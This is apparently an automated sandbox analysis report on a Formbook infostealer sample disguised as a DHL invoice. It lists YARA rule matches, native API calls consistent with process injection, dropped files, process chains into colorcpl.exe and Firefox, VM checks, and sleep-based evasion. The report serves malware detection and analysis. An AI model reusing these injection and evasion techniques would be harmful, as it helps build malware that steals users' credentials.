imeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Uses 32bit PE files

Source: DHLINV000156.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\DHLINV000156.exe

Code function: 2_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_00403235

Detected potential crypto function

Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_00406666	2_2_00406666
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_6ED71A98	2_2_6ED71A98
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334FE310	8_2_334FE310
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AF330	8_2_335AF330
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334E1380	8_2_334E1380
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334B2245	8_2_334B2245
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3350D210	8_2_3350D210
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334DD2EC	8_2_334DD2EC
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3353717A	8_2_3353717A
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335B010E	8_2_335B010E
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334DF113	8_2_334DF113
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3358D130	8_2_3358D130
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334F51C0	8_2_334F51C0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3350B1E0	8_2_3350B1E0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3359E076	8_2_3359E076
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334FB0D0	8_2_334FB0D0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335A70F1	8_2_335A70F1
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3352508C	8_2_3352508C
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334E00A0	8_2_334E00A0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335A6757	8_2_335A6757
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334F2760	8_2_334F2760
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334FA760	8_2_334FA760
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3359D646	8_2_3359D646
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33514670	8_2_33514670
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3350C600	8_2_3350C600
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3358D62C	8_2_3358D62C
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AA6C0	8_2_335AA6C0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AF6F6	8_2_335AF6F6
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334EC6E0	8_2_334EC6E0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335636EC	8_2_335636EC
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334F0680	8_2_334F0680
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335BA526	8_2_335BA526
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AF5C9	8_2_335AF5C9
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335A75C6	8_2_335A75C6
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334F0445	8_2_334F0445
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3355D480	8_2_3355D480
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_3352DB19	8_2_3352DB19
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334F0B10	8_2_334F0B10
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AFB2E	8_2_335AFB2E
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33564BC0	8_2_33564BC0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AEA5B	8_2_335AEA5B
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335ACA13	8_2_335ACA13
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335AFA89	8_2_335AFA89
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335359C0	8_2_335359C0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334B99E8	8_2_334B99E8

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: String function: 3356EF10 appears 56 times
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: String function: 3355E692 appears 59 times
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: String function: 33537BE4 appears 73 times
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: String function: 334DB910 appears 116 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335234E0 NtCreateMutant,LdrInitializeThunk,	8_2_335234E0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522B10 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_33522B10
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522BC0 NtQueryInformationToken,LdrInitializeThunk,	8_2_33522BC0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522B90 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_33522B90
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522A80 NtClose,LdrInitializeThunk,	8_2_33522A80
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335229F0 NtReadFile,LdrInitializeThunk,	8_2_335229F0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522F00 NtCreateFile,LdrInitializeThunk,	8_2_33522F00
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522E50 NtCreateSection,LdrInitializeThunk,	8_2_33522E50
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522ED0 NtResumeThread,LdrInitializeThunk,	8_2_33522ED0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522EB0 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_33522EB0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522D10 NtQuerySystemInformation,LdrInitializeThunk,	8_2_33522D10
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_33522DC0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522DA0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_33522DA0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522C50 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_33522C50
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522C30 NtMapViewOfSection,LdrInitializeThunk,	8_2_33522C30
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522CF0 NtDelayExecution,LdrInitializeThunk,	8_2_33522CF0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33524260 NtSetContextThread,	8_2_33524260
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33524570 NtSuspendThread,	8_2_33524570
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522B00 NtQueryValueKey,	8_2_33522B00
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522B20 NtQueryInformationProcess,	8_2_33522B20
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522BE0 NtQueryVirtualMemory,	8_2_33522BE0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522B80 NtCreateKey,	8_2_33522B80
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522A10 NtWriteFile,	8_2_33522A10
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522AC0 NtEnumerateValueKey,	8_2_33522AC0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_33522AA0 NtQueryInformationFile,	8_2_33522AA0
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_335229D0 NtWaitForSingleObject,	8_2_335229D0

PE file contains executable resources (Code or Archives)

Source: System.dll.2.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: System.Security.Cryptography.X509Certificates.dll.2.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000002.00000003.1947032871.00000000028EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000002.00000002.2463063383.0000000000439000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000002.00000003.1948493703.00000000028E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dll@ vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000003.3224594451.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000003.3135331050.000000003342B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000000.2367954507.0000000000439000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000002.3226706014.00000000000E3000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000003.3129565235.0000000033271000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000002.3271993572.0000000033780000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHLINV000156.exe
Source: DHLINV000156.exe, 00000008.00000002.3271993572.00000000335DD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHLINV000156.exe
Source: DHLINV000156.exe	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLINV000156.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\DHLINV000156.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: edgegdi.dll	Jump to behavior

PE / OLE file has an invalid certificate

Source: DHLINV000156.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: percentile.dll.2.dr	Static PE information: Number of sections : 19 > 10
Source: libdatrie-1.dll.2.dr	Static PE information: Number of sections : 11 > 10
Source: libpkcs11-helper-1.dll.2.dr	Static PE information: Number of sections : 12 > 10

Source: DHLINV000156.exe	Virustotal: Detection: 22%
Source: DHLINV000156.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\DHLINV000156.exe

File read: C:\Users\user\Desktop\DHLINV000156.exe

Source: unknown	Process created: C:\Users\user\Desktop\DHLINV000156.exe C:\Users\user\Desktop\DHLINV000156.exe
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process created: C:\Users\user\Desktop\DHLINV000156.exe C:\Users\user\Desktop\DHLINV000156.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process created: C:\Users\user\Desktop\DHLINV000156.exe C:\Users\user\Desktop\DHLINV000156.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_6ED72F60 push eax; ret	2_2_6ED72F8E
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA62A0 push esi; ret	2_2_04EA62A3
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA5A17 push FFFFFFE2h; ret	2_2_04EA5A19
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA65FA pushfd ; iretd	2_2_04EA6611
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA1B54 pushad ; iretd	2_2_04EA1B55
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA4726 push B90827B5h; iretd	2_2_04EA472D
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA2B04 pushad ; retf	2_2_04EA2B2B
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_04EA1514 pushad ; iretd	2_2_04EA1515
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334B21AD pushad ; retf 0004h	8_2_334B223F
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 8_2_334B97A1 push es; iretd	8_2_334B97A8

Source: libdatrie-1.dll.2.dr	Static PE information: section name: .xdata
Source: libpkcs11-helper-1.dll.2.dr	Static PE information: section name: .xdata
Source: maintenanceservice2.exe.2.dr	Static PE information: section name: .00cfg
Source: percentile.dll.2.dr	Static PE information: section name: .xdata
Source: percentile.dll.2.dr	Static PE information: section name: /4
Source: percentile.dll.2.dr	Static PE information: section name: /19
Source: percentile.dll.2.dr	Static PE information: section name: /31
Source: percentile.dll.2.dr	Static PE information: section name: /45
Source: percentile.dll.2.dr	Static PE information: section name: /57
Source: percentile.dll.2.dr	Static PE information: section name: /70
Source: percentile.dll.2.dr	Static PE information: section name: /81
Source: percentile.dll.2.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Temp\nsxCFC.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\DHLINV000156.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7976	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7976	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7976	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7976	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3144	Thread sleep count: 99 > 30	Jump to behavior
